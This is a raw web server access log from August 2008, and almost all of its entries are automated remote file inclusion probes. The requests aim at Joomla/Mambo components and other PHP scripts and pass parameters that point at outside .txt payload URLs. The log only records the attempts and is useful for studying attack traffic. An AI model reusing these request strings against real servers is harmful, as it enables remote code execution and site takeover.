69.10.155.195 - - [24/Aug/2008:04:23:45 -0500] "GET /logs/access_log.1208044800//?sIncPath%5Bdocroot%5D=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
69.10.155.195 - - [24/Aug/2008:04:23:45 -0500] "GET //?sIncPath%5Bdocroot%5D=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
69.10.155.195 - - [24/Aug/2008:04:23:45 -0500] "GET /logs//?sIncPath%5Bdocroot%5D=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 200 96475 "-""libwww-perl/5.812"
67.15.80.42 - - [24/Aug/2008:04:24:18 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powersporttoys.com/includes/cod3d%20id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
67.15.80.42 - - [24/Aug/2008:04:24:19 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powersporttoys.com/includes/cod3d%20id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
69.10.155.195 - - [24/Aug/2008:04:24:32 -0500] "GET /logs/access_log.1206230400//?sIncPath%5Bdocroot%5D=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.15.80.42 - - [24/Aug/2008:04:24:51 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powersporttoys.com/includes/cod3d%20id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
67.15.80.42 - - [24/Aug/2008:04:24:52 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.powersporttoys.com/includes/cod3d%20id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
86.58.154.237 - - [24/Aug/2008:04:26:23 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
86.58.154.237 - - [24/Aug/2008:04:26:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:04:27:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:04:27:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
202.228.204.130 - - [24/Aug/2008:04:28:10 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:28:10 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:28:11 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:28:12 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
202.156.14.10 - - [24/Aug/2008:04:28:39 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
202.156.14.10 - - [24/Aug/2008:04:28:42 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
202.156.14.10 - - [24/Aug/2008:04:28:42 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
202.156.14.10 - - [24/Aug/2008:04:28:43 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
202.156.14.10 - - [24/Aug/2008:04:28:44 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
202.156.14.10 - - [24/Aug/2008:04:28:44 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
202.156.14.10 - - [24/Aug/2008:04:28:48 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
81.26.209.159 - - [24/Aug/2008:04:30:06 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:04:30:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
67.212.173.42 - - [24/Aug/2008:04:31:15 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:04:31:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
80.93.62.114 - - [24/Aug/2008:04:32:58 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:32:58 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.212.173.42 - - [24/Aug/2008:04:33:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:04:33:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
208.97.183.24 - - [24/Aug/2008:04:34:18 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
208.97.183.24 - - [24/Aug/2008:04:34:18 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
217.20.113.117 - - [24/Aug/2008:04:34:30 -0500] "GET /logs/access_log.1214438400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.79"
217.20.113.117 - - [24/Aug/2008:04:34:30 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
217.20.113.117 - - [24/Aug/2008:04:34:30 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
217.172.186.250 - - [24/Aug/2008:04:35:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:04:35:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
70.85.201.66 - - [24/Aug/2008:04:35:34 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
70.85.201.66 - - [24/Aug/2008:04:35:34 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
66.103.128.44 - - [24/Aug/2008:04:35:44 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wichtl.at/files/echo? HTTP/1.1" 404 357 "-""libwww-perl/5.812"
66.103.128.44 - - [24/Aug/2008:04:35:44 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.wichtl.at/files/echo? HTTP/1.1" 404 352 "-""libwww-perl/5.812"
213.203.202.68 - - [24/Aug/2008:04:35:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
213.203.202.68 - - [24/Aug/2008:04:35:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
217.20.113.117 - - [24/Aug/2008:04:36:06 -0500] "GET /logs/access_log.1211500800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.79"
213.203.202.68 - - [24/Aug/2008:04:36:19 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
213.203.202.68 - - [24/Aug/2008:04:36:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
74.55.246.194 - - [24/Aug/2008:04:36:58 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:04:37:00 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
72.52.244.232 - - [24/Aug/2008:04:37:51 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:04:37:51 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:04:38:26 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:04:38:26 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:04:38:31 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:04:38:31 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:04:39:11 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
72.52.244.232 - - [24/Aug/2008:04:39:11 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
217.172.186.250 - - [24/Aug/2008:04:40:48 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:04:40:48 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
213.248.62.98 - - [24/Aug/2008:04:40:50 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
213.248.62.98 - - [24/Aug/2008:04:40:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:04:42:02 -0500] "GET /logs/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:04:42:02 -0500] "GET /errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
202.228.204.130 - - [24/Aug/2008:04:42:17 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:42:17 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:42:18 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:04:42:19 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
74.55.246.194 - - [24/Aug/2008:04:42:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:04:42:30 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
80.93.62.114 - - [24/Aug/2008:04:42:40 -0500] "GET /logs/access_log.1206230400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:42:41 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.93.62.114 - - [24/Aug/2008:04:42:41 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.207.106.54 - - [24/Aug/2008:04:43:05 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
74.55.246.194 - - [24/Aug/2008:04:43:07 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:04:43:07 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
193.207.106.54 - - [24/Aug/2008:04:43:11 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
74.202.49.162 - - [24/Aug/2008:04:44:15 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
74.202.49.162 - - [24/Aug/2008:04:44:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
74.52.99.98 - - [24/Aug/2008:04:45:35 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:04:45:35 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:04:46:44 -0500] "GET /logs/access_log.1205366400/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:04:47:02 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
69.10.154.65 - - [24/Aug/2008:04:47:02 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:04:47:03 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:04:47:03 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:04:48:56 -0500] "GET /logs/access_log.1211500800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:04:49:33 -0500] "GET /logs/access_log.1214179200%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 372 "-""libwww-perl/5.810"
62.65.159.210 - - [24/Aug/2008:04:50:24 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
62.65.159.210 - - [24/Aug/2008:04:50:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.76"
86.57.255.65 - - [24/Aug/2008:04:50:30 -0500] "GET /?sourcedir=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
86.57.255.65 - - [24/Aug/2008:04:50:33 -0500] "GET /logs/?sourcedir=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 200 96470 "-""libwww-perl/5.79"
72.9.233.10 - - [24/Aug/2008:04:50:49 -0500] "GET /?sourcedir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
72.9.233.10 - - [24/Aug/2008:04:50:49 -0500] "GET /logs/?sourcedir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 200 96470 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:04:50:57 -0500] "GET /logs/access_log.1208044800//popup_window.php?site_isp_root=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:04:50:57 -0500] "GET //popup_window.php?site_isp_root=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
64.185.237.191 - - [24/Aug/2008:04:50:57 -0500] "GET /logs//popup_window.php?site_isp_root=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
200.204.36.7 - - [24/Aug/2008:04:54:07 -0500] "GET /logs/index1.php?page=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
200.204.36.7 - - [24/Aug/2008:04:54:07 -0500] "GET /index1.php?page=http://websnap.ru//wp-content/uploads/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
86.57.255.65 - - [24/Aug/2008:04:54:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
86.57.255.65 - - [24/Aug/2008:04:54:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
69.94.70.15 - - [24/Aug/2008:04:55:08 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:04:55:08 -0500] "GET /errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
69.94.70.15 - - [24/Aug/2008:04:55:08 -0500] "GET /logs/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
86.57.255.65 - - [24/Aug/2008:04:56:26 -0500] "GET /logs//popup_window.php?site_isp_root=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
86.57.255.65 - - [24/Aug/2008:04:56:26 -0500] "GET /logs/access_log.1208044800//popup_window.php?site_isp_root=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
86.57.255.65 - - [24/Aug/2008:04:56:26 -0500] "GET //popup_window.php?site_isp_root=http://www.tendiko.hr/galerija/tendiko/id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
74.52.99.98 - - [24/Aug/2008:05:00:49 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:05:00:49 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
80.93.56.80 - - [24/Aug/2008:05:02:40 -0500] "GET /index1.php?page=http://www.degreeoferror.com/comics/on.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
202.228.204.130 - - [24/Aug/2008:05:06:18 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:05:06:19 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.6.8.121 - - [24/Aug/2008:05:06:33 -0500] "GET /logs/access_log.1185321600 HTTP/1.0" 200 129324 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.99.98 - - [24/Aug/2008:05:06:52 -0500] "GET /logs//popup_window.php?site_isp_root=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:05:06:52 -0500] "GET /logs/access_log.1208044800//popup_window.php?site_isp_root=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
74.52.99.98 - - [24/Aug/2008:05:06:52 -0500] "GET //popup_window.php?site_isp_root=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.810"
202.228.204.130 - - [24/Aug/2008:05:07:33 -0500] "GET /logs/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:05:07:33 -0500] "GET /logs/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:05:07:33 -0500] "GET /excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
202.228.204.130 - - [24/Aug/2008:05:07:33 -0500] "GET /excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
